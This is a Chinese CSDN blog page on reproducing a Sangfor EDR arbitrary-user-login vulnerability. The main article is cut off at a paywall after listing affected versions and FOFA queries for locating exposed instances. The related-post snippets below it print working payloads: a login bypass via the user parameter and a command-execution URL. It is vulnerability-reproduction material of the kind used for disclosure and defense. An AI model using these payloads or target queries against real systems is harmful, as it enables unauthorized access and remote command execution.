深信服EDR任意用户登录

已于 2023-04-19 23:03:46 修改
阅读量543 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: php 安全 网络
于 2023-03-17 18:05:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nnn2188185/article/details/129623460
版权

文章目录

深信服EDR任意用户登录

1.深信服EDR简介

微信公众号搜索:南风漏洞复现文库
南风网络安全公众号首发

终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。
  EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。
  端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。深信服的 EDR产品也支持与AC、SIP、AF、SOC、X-central产品的联动协同响应,形成新一代的安全防护体系。

2.漏洞描述

深信服终端检测响应平台EDR可通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。深信服终端监测响应平台(EDR)存在任意用户登录漏洞。攻击者可通过构造HTTP请求来利用此漏洞,成功利用此漏洞的攻击者可以未授权访问该平台后台。

3.影响版本

EDR <= v3.2.19

4.fofa查询语句

app="SANGFOR-EDR"

title="终端检测响应平台"

5.漏洞复现

漏洞链接:https://IP地址/u
了解本专栏 订阅专栏 解锁全文 超级会员免费看
sublime88
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
CNVD-2020-46552 深信服EDR命令执行漏洞
nnn2188185的博客
03-22 928
深信服终端监测响应平台(EDR)存在远程命令执行漏洞。攻击者可通过构造HTTP请求来利用此漏洞,成功利用此漏洞的攻击者可以在目标主机上执行任意命令。
深信服EDR(终端检测响应平台)任意用户登录POC
Websec
08-20 4463
深信服edr远程命令执行复现 1、POC payload: https://ip/ui/login.php?user=(随便写个可使用的账户即可) 例如: https://xxxxx/ui/login.php?user=admin 输入完毕以后即可使用admin权限直接登录平台 2、FOFA语法 语法 title="终端检测响应平台" https://fofa.so/result?q=%E7%BB%88%E7%AB%AF%E6%A3%80%E6%B5%8B%E5%93%8D%E5%BA%94.
深信服行为感知系统和终端检测响应平台EDR REC复现渗透测试
kelenwait的博客
06-24 1779
简介 深信服行为感知系统和终端检测响应平台EDR深信服科技股份有限公司推出的安全产品,其行为感知系统 c.php 存在远程命令执行漏洞,与其相同模板的还有部分EDR,同样导致远程命令执行。 漏洞影响 深信服EDR 3.2.16 深信服EDR 3.2.17 深信服EDR 3.2.19 深信服 行为感知系统 漏洞复现 登录界面 c.php 远程命令执行漏洞 使用以下poc进行访问 /tool/log/c.php?strip_slashes=system&host=echo hello /tool/l
非法操作 login.php,【最新重磅】深信服 EDR终端检测响应平台-任意用户免密登录漏洞...
weixin_36285258的博客
04-01 377
注:本文仅供学习使用,请勿用于非法操作,后果与作者无关!0x01 介绍深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。0x02 ...
深信服 EDR终端检测响应平台免登陆后台漏洞代码分析
shy的博客
08-20 5227
睡了一觉起来,什么鬼,深信服 EDR终端检测响应平台又出事了,又爆出了两个漏洞,一个是官方公布的升级包中泄漏了源代码,一个是未授权访问,不使用账号、密码就可直接登陆管理后台。我滴天啦! 复现: payload:https://ip:prot/ui/login.php?user=随便写一点儿字母 例如: 在登录框访问https://ip:prot/ui/login.php?user=qwer,然后回车 登陆成功: ...
深信服EDR主打PPT(商业版).pptx
09-16
深信服EDR作为一款先进的终端安全解决方案,旨在应对日益复杂的威胁环境,通过以AI为核心的技术,重构下一代终端安全,实现从传统的防病毒策略向更智能、更全面的终端威胁检测与响应(EDR)转变。 终端安全的发展...
深信服PT1-EDR题库
最新发布
06-04
深信服认证PT1-EDR题库,亲测可过
深信服edr终端检测响应平台(_3.2.21)代码审计挖掘(RCE)1
08-03
深信服edr的这个版本中,存在一个允许执行任意命令的漏洞。 3. **C#软件/插件开发**:虽然具体漏洞细节没有提及C#编程语言,但标签指出问题与C#有关,可能意味着该平台的部分或全部是用C#编写的,因此需要关注C#...
深信服终端安全管理系统EDR用户手册
02-28
深信服EDR用户手册 用于熟悉EDR使用和配置
深信服EDR解决方案-V2.pptx
08-25
深信服EDR解决方案-V2
无胁科技-TVD每日漏洞情报-2022-8-1
wuthreat无胁科技的博客
08-01 432
参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?漏洞编号CVE-2022-26188;漏洞编号CVE-2022-25915;...
深信服超融合平台管理页面
Reyn_观极
09-23 897
深信服云管理平台提供的虚拟化资源池功能,使IT部门能够将IT物理资源,抽象成按需提供的弹性虚拟资源池包括云主机、存储、网络网络安全,以消费单元(即租户或虚拟数据中心)的形式对外提供服务。
深信服edr终端漏洞
qq_40806924的博客
08-20 4381
一、前言 最近这些天来了广州当蓝方,工作之余听到了几个朋友说关于深信服edr爆0day的情况,自己也没时间复现,就简单记录一下。 该XXX简介: 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 ** 二、影响范围 fofa上大概有37页
深信服EDR终端检测响应平台RCE漏洞复现
m0_37777713的博客
08-18 4350
深信服EDR终端检测响应平台RCE漏洞复现 背景介绍 早在2019年11月份的时候,就有人爆出有人手里屯着深信服某产品的0day。由于是0day,当然没有人见过,也就不了了之。就在昨天,HW正式开始的第一天,有个铁憨憨在某军500人的群聊中放出了深信服EDR的复现过程截图,然后这张图就瞬间在安全圈子内传遍了。 复现过程 我们在fofa,Zoomeye等一些引擎上搜索关键字就可以找到一大堆对公网开放的EDR。以fofa为例,搜索title="终端检测响应平台" 接着,随便点开一个进行测试,找到登录界面,确
深信服 EDR终端检测响应平台RCE漏洞
汗的博客
08-18 1546
payload https://ip+端口/tool/log/c.php?strip_slashes=system&host=whoami 改改host的参数就能rce fofa语法 title="终端检测响应平台" 处理方式 只能暂时下线,貌似问题还比较多,很多要重写 资产基本是国内的,别乱打了,,, ...
深信服 EDR终端检测响应平台RCE漏洞代码分析
shy的博客
08-18 7130
一觉醒来,听说护网蓝队捕获了一个深信服的0day,待我看完这部局再分析一下。 EDR简介 终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。 fofa语法 title="终端检测响应平台" 漏洞复现 https://ip+端口/tool/log/c.php?strip_slashes=system&host=id 代码分析 将c.php文件拷贝到本地进行分析 $_REQUEST会将接入..
深信服 EDR终端检测响应平台-任意用户免密登录漏洞
weixin_43526443的博客
08-20 2007
0x01 介绍   深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 0x02 fofa: title=“SANGFOR终端检测响应平台” 0x03 payload: https://ip/ui/login.php?user=admin
【HW2020漏洞回顾】深信服EDR两大漏洞
wuguojie888的博客
08-20 9039
深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理,支持对安全事件的一键隔离处置,以及对热点事件IOC的全网威胁定位。绝大多数的EDR管理平台部署于内网环境中,少数系统可以通过外网地址访问。 NO.1 后台任意用户登陆漏洞 【详情】攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权..
某信服EDR终端检测响应平台RCE漏洞
cj_Hydra's Blog
08-18 4855
前言: 这个平台是干嘛的,这里就不废话了,刚好赶上了护网期间爆出来的,回头就被告知护网结束,这里简单复现一下。 复现: 第一步:通过fofa搜索语法title="终端检测响应平台"可以找到一大批使用该系统的站点。 第二步:随缘点击进去一个来到主界面,也就是这个样子。 第三步:构造payload,这里漏洞文件是c.php,漏洞参数是host /tool/log/c.php?strip_slashes=system&host=id 直接root权限 反弹shell。 ...
终端检测响应用户手册,如何更加合理和规范制作SOP用户手册
01-03
"深信服终端检测响应平台EDR用户手册,3.5.16版本,文档版本01,发布于2022-1-7,由深信服科技股份有限公司编写。手册涵盖产品使用、操作指南和注意事项,旨在帮助用户合理规范地制作SOP用户手册。" 深信服终端检测...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sublime88

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值